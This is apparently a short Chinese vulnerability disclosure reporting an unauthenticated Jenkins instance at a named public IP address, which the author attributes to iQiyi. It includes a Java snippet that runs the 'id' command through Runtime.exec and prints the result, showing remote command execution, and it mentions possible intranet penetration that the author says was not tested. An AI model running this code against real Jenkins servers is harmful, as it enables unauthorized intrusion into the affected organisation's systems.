http://220.181.109.120:8080/ Jenkins平台,未授权访问,应该是奇艺的,看图:
还可以直接执行命令呢,继续深入的话可渗透内网(未授权不敢测试)
Runtime runtime = Runtime.getRuntime(); Process process = runtime.exec("id"); process.getInputStream(); BufferedReader br = new BufferedReader(new InputStreamReader(process.getInputStream())); String inline; String returnvalue = ""; while ((inline = br.readLine()) != null) { returnvalue +=( inline ); } br.close(); out.println(returnvalue);